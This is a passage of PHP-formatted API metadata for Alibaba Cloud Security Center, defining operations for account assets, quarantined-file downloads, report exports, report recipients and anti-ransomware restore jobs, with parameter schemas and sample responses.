\\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"Propertys\\": [\\n {\\n \\"Status\\": \\"**\\",\\n \\"LastLoginIp\\": \\"192.168.XX.XX\\",\\n \\"InternetIp\\": \\"192.168.XX.XX\\",\\n \\"LastLoginTime\\": \\"2022-04-04 18:07:06\\",\\n \\"IsRoot\\": \\"0\\",\\n \\"Ip\\": \\"192.168.XX.XX\\",\\n \\"User\\": \\"bin\\",\\n \\"InstanceId\\": \\"i-hp35tftuh52wbp1g****\\",\\n \\"IntranetIp\\": \\"100.104.XX.XX\\",\\n \\"PasswordExpirationDate\\": \\"never\\",\\n \\"Uuid\\": \\"162eb349-c2d9-4f8b-805c-75b43d4c****\\",\\n \\"LastLoginTimestamp\\": 1649066826000,\\n \\"InstanceName\\": \\"hc-host-****\\",\\n \\"AccountsExpirationDate\\": \\"never\\",\\n \\"CreateTimestamp\\": 1649149566000,\\n \\"GroupNames\\": [\\n \\"[\\\\\\"bin\\\\\\"]\\"\\n ],\\n \\"LastLoginTimeDt\\": 1649066826000,\\n \\"IsPasswdExpired\\": 1,\\n \\"IsPasswdLocked\\": 1,\\n \\"IsUserExpired\\": 1,\\n \\"IsCouldLogin\\": 0,\\n \\"IsSudoer\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'DescribePropertyUserItem' => [ 'summary' => 'Retrieves the account information of assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'ForceFlush', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to forcefully refresh the data to be queried. Valid values:'."\n" .'- **true**: Forcefully refresh.'."\n" .'- **false**: Do not forcefully refresh.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'User', 'in' => 'query', 'schema' => ['description' => 'The account information of Asset Fingerprints.', 'type' => 'string', 'required' => false, 'example' => 'adm', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to display in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to display on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generated for the request.', 'type' => 'string', 'example' => '76068BE2-F9C4-4EDD-967B-F503B8CCDD3D', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page to display in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries displayed on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '114', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PropertyItems' => [ 'description' => 'The account information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'User' => ['description' => 'The account name.', 'type' => 'string', 'example' => 'adm', 'title' => ''], 'Count' => ['description' => 'The number of servers associated with the account.', 'type' => 'integer', 'format' => 'int32', 'example' => '384', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve account information of assets', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyUserItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyUserItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"76068BE2-F9C4-4EDD-967B-F503B8CCDD3D\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 2,\\n \\"TotalCount\\": 114,\\n \\"Count\\": 2\\n },\\n \\"PropertyItems\\": [\\n {\\n \\"User\\": \\"adm\\",\\n \\"Count\\": 384\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeQuaraFileDownloadInfo' => [ 'summary' => 'Queries the download information of a quarantined file for a security alert.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92168', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'QuaraFileId', 'in' => 'query', 'schema' => ['description' => 'The ID of the quarantined file.'."\n" ."\n" .'> If you do not specify this parameter, calling the RollbackSuspEventQuaraFile operation does not cancel the quarantine of the file in the quarantine box, which means the call does not take effect. Call the [DescribeSuspEventQuaraFiles](~~DescribeSuspEventQuaraFiles~~) operation to obtain the quarantined file ID (the value of the Id parameter).', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source identifier of the request. Set the value to sas.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The unique identifier of the asset.', 'type' => 'string', 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], 'QuaraFileId' => ['description' => 'The ID of the quarantined file.', 'type' => 'integer', 'format' => 'int32', 'example' => '123', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '29874225-EAAC-5415-8501-32DD20FXXXXX', 'title' => ''], 'DownloadUrl' => ['description' => 'The download URL. The URL is valid for 5 minutes.', 'type' => 'string', 'example' => 'https://xxxxxxxx.oss-cn-hangzhou-1.aliyuncs.com/xxxxx/xxxxxxxxxxxxxx?Expires=1671448125&OSSAccessKeyId=xxx', 'title' => ''], 'Path' => ['description' => 'The file path.', 'type' => 'string', 'example' => '/etc/test', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash of the file.', 'type' => 'string', 'example' => 'bb62ef1311bc564377a0378d3axxxxxx', 'title' => ''], 'Tag' => ['description' => 'The tag of the alert record.', 'type' => 'string', 'example' => '6d4ff40a22b15c86adecf2aa48xxxxx', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query download link for a quarantined file', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeQuaraFileDownloadInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeQuaraFileDownloadInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Uuid\\": \\"4fe8e1cd-3c37-4851-b9de-124da32c****\\",\\n \\"QuaraFileId\\": 123,\\n \\"RequestId\\": \\"29874225-EAAC-5415-8501-32DD20FXXXXX\\",\\n \\"DownloadUrl\\": \\"https://xxxxxxxx.oss-cn-hangzhou-1.aliyuncs.com/xxxxx/xxxxxxxxxxxxxx?Expires=1671448125&OSSAccessKeyId=xxx\\",\\n \\"Path\\": \\"/etc/test\\",\\n \\"Md5\\": \\"bb62ef1311bc564377a0378d3axxxxxx\\",\\n \\"Tag\\": \\"6d4ff40a22b15c86adecf2aa48xxxxx\\"\\n}","type":"json"}]', ], 'DescribeReportExport' => [ 'summary' => 'Queries the export information of a security report.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ExportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the export task.'."\n" .'> Call [ExportCustomizeReport](~~ExportCustomizeReport~~) to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'ExportId' => ['description' => 'The ID of the export task.', 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925FDAA', 'title' => ''], 'DownloadUrl' => ['description' => 'The download URL of the report.', 'type' => 'string', 'example' => 'https://xxxxxxxx.oss-cn-hangzhou-1.aliyuncs.com/xxxxx/xxxxxxxxxxxxxx?Expires=1671448125&OSSAccessKeyId=xxx', 'title' => ''], 'UrlExpiredTime' => ['description' => 'The expiration timestamp of the report download URL. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1660113647000', 'title' => ''], 'ExportDate' => ['description' => 'The time when the report was generated.', 'type' => 'string', 'example' => '2022-12-15', 'title' => ''], 'ReportId' => ['description' => 'The security report ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '377665', 'title' => ''], 'ExportStatus' => ['description' => 'The status of the export task. Valid values:'."\n" .'- **-1**: Export failed.'."\n" .'- **0**: Export initialized.'."\n" .'- **1**: Exporting.'."\n" .'- **2**: Export succeeded.', 'type' => 'string', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security report export information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeReportExport'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-aegis:DescribeReportExport', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ExportId\\": 2,\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925FDAA\\",\\n \\"DownloadUrl\\": \\"https://xxxxxxxx.oss-cn-hangzhou-1.aliyuncs.com/xxxxx/xxxxxxxxxxxxxx?Expires=1671448125&OSSAccessKeyId=xxx\\",\\n \\"UrlExpiredTime\\": 1660113647000,\\n \\"ExportDate\\": \\"2022-12-15\\",\\n \\"ReportId\\": 377665,\\n \\"ExportStatus\\": \\"2\\"\\n}","type":"json"}]', ], 'DescribeReportRecipientStatus' => [ 'summary' => 'Queries the status of report contacts by using the system configuration and security report feature of Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '39.174.xxx.xxx', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Recipients', 'in' => 'query', 'schema' => ['description' => 'The email addresses of the contacts. Separate multiple email addresses with commas (,).', 'type' => 'string', 'required' => true, 'example' => 'username@example.com,username@example.com', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8', 'title' => ''], 'ReportRecipientList' => [ 'description' => 'The list of report contacts.', 'type' => 'array', 'items' => [ 'description' => 'The information about a report contact.', 'type' => 'object', 'properties' => [ 'Recipient' => ['description' => 'The email address of the contact.'."\n" ."\n" .'> If the email address is not added to the security report, the return value is empty.', 'type' => 'string', 'example' => 'username@example.com', 'title' => ''], 'IsVerify' => ['description' => 'The verification status. Valid values:'."\n" ."\n" .'- 0: Not verified.'."\n" .'- 1: Verified.'."\n" ."\n" .'> If the email address is not added to the security report, the return value is empty.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query report contact status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeReportRecipientStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeReportRecipientStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8\\",\\n \\"ReportRecipientList\\": [\\n {\\n \\"Recipient\\": \\"username@example.com\\",\\n \\"IsVerify\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeRestoreJobs' => [ 'summary' => 'Queries the details about restoration tasks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92171', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the restoration task. Valid values:'."\n" ."\n" .'* **RUNNING**: The task is running.'."\n" .'* **COMPLETE**: The task is complete.'."\n" .'* **FAILED**: The task fails.'."\n" .'* **CANCELING**: The task is being canceled.'."\n" .'* **CANCELED**: The task is canceled.'."\n" .'* **PARTIAL_COMPLETE**: The task is partially successful.'."\n" .'* **CREATED**: The task is created but is not run.'."\n" .'* **EXPIRED**: The task is not updated.'."\n" .'* **QUEUED**: The task is waiting to be run.'."\n" .'* **CLIENT_DELETED**: The task fails because the anti-ransomware agent is uninstalled.'."\n", 'type' => 'string', 'required' => false, 'example' => 'RUNNING', 'title' => ''], ], [ 'name' => 'MachineRemark', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the server on which the restoration task is run. For example, you can use the IP address or the name of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.1.XX.XX', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '0ED92280-4363-57D3-A4D3-4D3FBC99B29F', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of restoration tasks returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of restoration tasks returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RestoreJobs' => [ 'description' => 'The details about the restoration tasks.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the restoration task. Valid values:'."\n" ."\n" .'* **RUNNING**: The task is running.'."\n" .'* **COMPLETE**: The task is complete.'."\n" .'* **FAILED**: The task fails.'."\n" .'* **CANCELING**: The task is being canceled.'."\n" .'* **CANCELED**: The task is canceled.'."\n" .'* **PARTIAL_COMPLETE**: The task is partially successful.'."\n" .'* **CREATED**: The task was created but is not run.'."\n" .'* **EXPIRED**: The task is not updated.'."\n" .'* **QUEUED**: The task is waiting to be run.'."\n" .'* **CLIENT_DELETED**: The task fails because the anti-ransomware agent is uninstalled.'."\n", 'type' => 'string', 'example' => 'COMPLETE', 'title' => ''], 'SnapshotHash' => ['description' => 'The hash value of the snapshot that stores backup data when the data is backed up.'."\n", 'type' => 'string', 'example' => 'a3992de83f529b844135fe795d949181735a7d20e0ac8539485c61b7983e618f', 'title' => ''], 'SourceClientId' => ['description' => 'The ID of the anti-ransomware agent that is used to back up data.'."\n", 'type' => 'string', 'example' => 'c-000gmcypy5dyf9ey3uv7', 'title' => ''], 'ErrorFileUrl' => ['description' => 'The URL to download the CSV file. The CSV file contains the files that fail to be restored.'."\n", 'type' => 'string', 'example' => '["/home/user"]', 'title' => ''], 'Includes' => ['description' => 'The directory in which the restored file is stored. The value is the directory that you specify for protection when you create the anti-ransomware policy'."\n", 'type' => 'string', 'example' => '["/root/disk-uuid-test","/root/install.sh"]', 'title' => ''], 'RestoreName' => ['description' => 'The name of the restoration task.'."\n", 'type' => 'string', 'example' => 'Restore', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server whose data you want to restore.'."\n", 'type' => 'string', 'example' => '1.1.XX.XX', 'title' => ''], 'VaultId' => ['description' => 'The ID of the backup vault in which the backup data is stored.'."\n", 'type' => 'string', 'example' => 'v-000b0v0jqzmse2yz06zw', 'title' => ''], 'ActualBytes' => ['description' => 'The size of backup data. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], 'Message' => ['description' => 'The error message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'Percentage' => ['description' => 'The progress of the restoration task in percentage.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'GmtModified' => ['description' => 'The time when the restoration task is updated.'."\n", 'type' => 'string', 'example' => '2021-04-25T19:11Z', 'title' => ''], 'RestoreType' => ['description' => 'The type of the file that is restored. Valid values:'."\n" ."\n" .'* **ECS_FILE**: files on Elastic Compute Service (ECS) instances'."\n" .'* **FILE**: files on servers in data centers'."\n", 'type' => 'string', 'example' => 'ECS_FILE', 'title' => ''], 'ExitCode' => ['description' => 'The return value of the restoration task.'."\n", 'type' => 'string', 'example' => '0', 'title' => ''], 'ClientId' => ['description' => 'The ID of the anti-ransomware agent that is used to perform the restoration task.'."\n", 'type' => 'string', 'example' => 'c-000frxwusjauhp9ajpu6', 'title' => ''], 'ItemsDone' => ['description' => 'The number of files that are restored.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'BytesTotal' => ['description' => 'The total size of data that you want to restore. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '0ED92280-4363-57D3-A4D3-4D3FBC99B29F', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server whose data you want to restore.'."\n", 'type' => 'string', 'example' => 'win2012-01', 'title' => ''], 'CompleteTime' => ['description' => 'The timestamp when the restoration task is complete. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1583289054000', 'title' => ''], 'ErrorType' => ['description' => 'The error code that is returned for the restoration task.'."\n", 'type' => 'string', 'example' => 'NONE', 'title' => ''], 'SnapshotVersion' => ['description' => 'The version of the backup data.'."\n", 'type' => 'string', 'example' => '2020-03-03 18:00', 'title' => ''], 'Target' => ['description' => 'The folder to which the backup data is restored. After you create the restoration task, the backup data is restored to the specified folder.'."\n", 'type' => 'string', 'example' => '/home', 'title' => ''], 'CreatedTime' => ['description' => 'The timestamp when the restoration task is created. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1583289052000', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server whose data you want to restore.'."\n", 'type' => 'string', 'example' => 'i-bp12xnvdax6307gw****', 'title' => ''], 'Source' => ['description' => 'The restored content.'."\n", 'type' => 'string', 'example' => '["/home/admin","\\\\\\\\servername\\\\sharename"]', 'title' => ''], 'IntranetIp' => ['description' => 'The internal IP address of the server whose data you want to restore.'."\n", 'type' => 'string', 'example' => '2.1.XX.XX', 'title' => ''], 'ErrorFile' => ['description' => 'The name of the CSV file. The CSV file contains the files that fail to be restored.'."\n", 'type' => 'string', 'example' => 's-000f4wxm8f7gur6g2otm.csv', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server whose data you want to restore.'."\n", 'type' => 'string', 'example' => '6E3DABB6-3F6A-40DB-9492-2C8B59C****', 'title' => ''], 'Excludes' => ['description' => 'The directory excluded from the anti-ransomware policy. The value is the directory that you specify to skip protection when you create the anti-ransomware policy.'."\n", 'type' => 'string', 'example' => '["/home/user"]', 'title' => ''], 'Speed' => ['description' => 'The speed at which data is restored. Unit: byte/s.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '25766558', 'title' => ''], 'SnapshotId' => ['description' => 'The hash value ID of the snapshot that stores backup data when the data is backed up.'."\n", 'type' => 'string', 'example' => 's-000gmcypy5dy54e39yny', 'title' => ''], 'UpdatedTime' => ['description' => 'The timestamp when the restoration task was last updated. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1583289054000', 'title' => ''], 'RestoreId' => ['description' => 'The ID of the restoration task.'."\n", 'type' => 'string', 'example' => 'r-000gmcypy5dyf9ey3uv7', 'title' => ''], 'GmtCreate' => ['description' => 'The time when the restoration task is created.'."\n", 'type' => 'string', 'example' => '2021-04-25T19:11Z', 'title' => ''], 'Eta' => ['description' => 'The timestamp when the in-progress restoration task is expected to be complete. Unit: seconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1583299054', 'title' => ''], 'Duration' => ['description' => 'The duration of the restoration task. Unit: seconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], 'ErrorCount' => ['description' => 'The number of the restoration tasks on which errors occur.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'ItemsTotal' => ['description' => 'The total number of files that need to be restored.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'BytesDone' => ['description' => 'The total size of data that is restored. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], 'VaultRegionId' => ['description' => 'The ID of the region where the backup vault resides.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"0ED92280-4363-57D3-A4D3-4D3FBC99B29F\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 2\\n },\\n \\"RestoreJobs\\": [\\n {\\n \\"Status\\": \\"COMPLETE\\",\\n \\"SnapshotHash\\": \\"a3992de83f529b844135fe795d949181735a7d20e0ac8539485c61b7983e618f\\",\\n \\"SourceClientId\\": \\"c-000gmcypy5dyf9ey3uv7\\",\\n \\"ErrorFileUrl\\": \\"[\\\\\\"/home/user\\\\\\"]\\",\\n \\"Includes\\": \\"[\\\\\\"/root/disk-uuid-test\\\\\\",\\\\\\"/root/install.sh\\\\\\"]\\",\\n \\"RestoreName\\": \\"Restore\\",\\n \\"InternetIp\\": \\"1.1.XX.XX\\",\\n \\"VaultId\\": \\"v-000b0v0jqzmse2yz06zw\\",\\n \\"ActualBytes\\": 20,\\n \\"Message\\": \\"successful\\",\\n \\"Percentage\\": 100,\\n \\"GmtModified\\": \\"2021-04-25T19:11Z\\",\\n \\"RestoreType\\": \\"ECS_FILE\\",\\n \\"ExitCode\\": \\"0\\",\\n \\"ClientId\\": \\"c-000frxwusjauhp9ajpu6\\",\\n \\"ItemsDone\\": 0,\\n \\"BytesTotal\\": 20,\\n \\"RequestId\\": \\"0ED92280-4363-57D3-A4D3-4D3FBC99B29F\\",\\n \\"InstanceName\\": \\"win2012-01\\",\\n \\"CompleteTime\\": 1583289054000,\\n \\"ErrorType\\": \\"NONE\\",\\n \\"SnapshotVersion\\": \\"2020-03-03 18:00\\",\\n \\"Target\\": \\"/home\\",\\n \\"CreatedTime\\": 1583289052000,\\n \\"InstanceId\\": \\"i-bp12xnvdax6307gw****\\",\\n \\"Source\\": \\"[\\\\\\"/home/admin\\\\\\",\\\\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\servername\\\\\\\\\\\\\\\\sharename\\\\\\"]\\",\\n \\"IntranetIp\\": \\"2.1.XX.XX\\",\\n \\"ErrorFile\\": \\"s-000f4wxm8f7gur6g2otm.csv\\",\\n \\"Uuid\\": \\"6E3DABB6-3F6A-40DB-9492-2C8B59C****\\",\\n \\"Excludes\\": \\"[\\\\\\"/home/user\\\\\\"]\\",\\n \\"Speed\\": 25766558,\\n \\"SnapshotId\\": \\"s-000gmcypy5dy54e39yny\\",\\n \\"UpdatedTime\\": 1583289054000,\\n \\"RestoreId\\": \\"r-000gmcypy5dyf9ey3uv7\\",\\n \\"GmtCreate\\": \\"2021-04-25T19:11Z\\",\\n \\"Eta\\": 1583299054,\\n \\"Duration\\": 100,\\n \\"ErrorCount\\": 0,\\n \\"ItemsTotal\\": 0,\\n \\"BytesDone\\": 20,\\n \\"VaultRegionId\\": \\"cn-hangzhou\\"\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 0ED92280-4363-57D3-A4D3-4D3FBC99B29F\\n \\n 1\\n 10\\n 69\\n 2\\n \\n \\n COMPLETE\\n a3992de83f529b844135fe795d949181735a7d20e0ac8539485c61b7983e618f\\n c-000gmcypy5dyf9ey3uv7\\n [\\"/home/user\\"]\\n [\\"/root/disk-uuid-test\\",\\"/root/install.sh\\"]\\n Restore\\n 1.1.XX.XX\\n v-000b0v0jqzmse2yz06zw\\n 20\\n successful\\n 100\\n 2021-04-25T19:11Z\\n ECS_FILE\\n 0\\n c-000frxwusjauhp9ajpu6\\n 0\\n 20\\n 0ED92280-4363-57D3-A4D3-4D3FBC99B29F\\n win2012-01\\n 1583289054000\\n NONE\\n 2020-03-03 18:00\\n /home\\n 1583289052000\\n i-bp12xnvdax6307gw****\\n 